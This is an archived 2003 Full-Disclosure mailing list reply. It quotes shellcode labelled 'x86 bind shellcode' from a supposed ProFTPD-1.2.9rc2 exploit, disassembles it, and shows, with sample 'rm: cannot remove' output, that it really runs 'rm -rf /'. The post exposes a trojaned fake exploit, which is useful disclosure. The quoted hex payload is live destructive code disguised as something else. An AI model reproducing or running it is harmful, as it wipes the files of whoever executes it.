lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <1067014087.24636.3.camel@Pimpzter>
From: dilema at dtors.net (dilema)
Subject: ProFTPD-1.2.9rc2 localhost delete

Yeah umm thats some sexy shellcode there.

> 
> /* x86 bind shellcode */
> char sc[]=
> "\x31\xc0\x50\x68\x66\x20\x2f\x58\x68\x6d\x20\x2d\x72\x68\x2d"
> "\x63\x58\x72\x68\x41\x41\x41\x41\x68\x41\x41\x41\x41\x68\x41"
> "\x41\x41\x41\x68\x41\x41\x41\x41\x68\x2f\x73\x68\x43\x68\x2f"
> "\x62\x69\x6e\x31\xc0\x88\x44\x24\x07\x88\x44\x24\x1a\x88\x44"
> "\x24\x23\x89\x64\x24\x08\x31\xdb\x8d\x5c\x24\x18\x89\x5c\x24"
> "\x0c\x31\xdb\x8d\x5c\x24\x1b\x89\x5c\x24\x10\x89\x44\x24\x14"
> "\x31\xdb\x89\xe3\x8d\x4c\x24\x08\x31\xd2\x8d\x54\x24\x14\xb0"
> "\x0b\xcd\x80\x31\xdb\x31\xc0\x40\xcd\x80";

00000002  50                push eax
00000003  6866202F58        push dword 0x582f2066
00000008  686D202D72        push dword 0x722d206d
0000000D  682D635872        push dword 0x7258632d
00000012  6841414141        push dword 0x41414141
00000017  6841414141        push dword 0x41414141
0000001C  6841414141        push dword 0x41414141
00000021  6841414141        push dword 0x41414141
00000026  682F736843        push dword 0x4368732f
0000002B  682F62696E        push dword 0x6e69622f
00000030  31C0              xor eax,eax
00000032  88442407          mov [esp+0x7],al
00000036  8844241A          mov [esp+0x1a],al
0000003A  88442423          mov [esp+0x23],al
0000003E  89642408          mov [esp+0x8],esp
00000042  31DB              xor ebx,ebx
00000044  8D5C2418          lea ebx,[esp+0x18]
00000048  895C240C          mov [esp+0xc],ebx
0000004C  31DB              xor ebx,ebx
0000004E  8D5C241B          lea ebx,[esp+0x1b]
00000052  895C2410          mov [esp+0x10],ebx
00000056  89442414          mov [esp+0x14],eax
0000005A  31DB              xor ebx,ebx
0000005C  89E3              mov ebx,esp
0000005E  8D4C2408          lea ecx,[esp+0x8]
00000062  31D2              xor edx,edx
00000064  8D542414          lea edx,[esp+0x14]
00000068  B00B              mov al,0xb
0000006A  CD80              int 0x80
0000006C  31DB              xor ebx,ebx
0000006E  31C0              xor eax,eax
00000071  CD80              int 0x80

## Super Seczy Shellcode ##

rm: cannot remove `//bin': Permission denied  
rm: cannot remove `//dev': Permission denied  
rm: cannot remove `//etc': Permission denied
rm: cannot remove `//lib': Permission denied
rm: cannot remove `//mnt': Permission denied 
rm: cannot remove `//opt': Permission denied
rm: cannot remove `//tmp': Permission denied  
rm: cannot remove `//sys': Permission denied
rm: cannot remove `//var': Permission denied
rm: cannot remove `//usr': Permission denied
rm: cannot remove `//boot': Permission denied
rm: cannot remove `//home': Permission denied
rm: cannot remove `//proc': Permission denied
rm: cannot remove `//sbin': Permission denied
rm: cannot remove `//root': Permission denied
rm: cannot remove `//share': Permission denied
rm: cannot remove `//.bash_history': Permission denied
rm: cannot remove `//.xauthKbxfnN': Permission denied
rm: cannot remove `//.irssi': Permission denied
-- 
dilema <dilema@...rs.net>
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 481 bytes
Desc: This is a digitally signed message part
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20031024/c8645670/attachment.bin

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ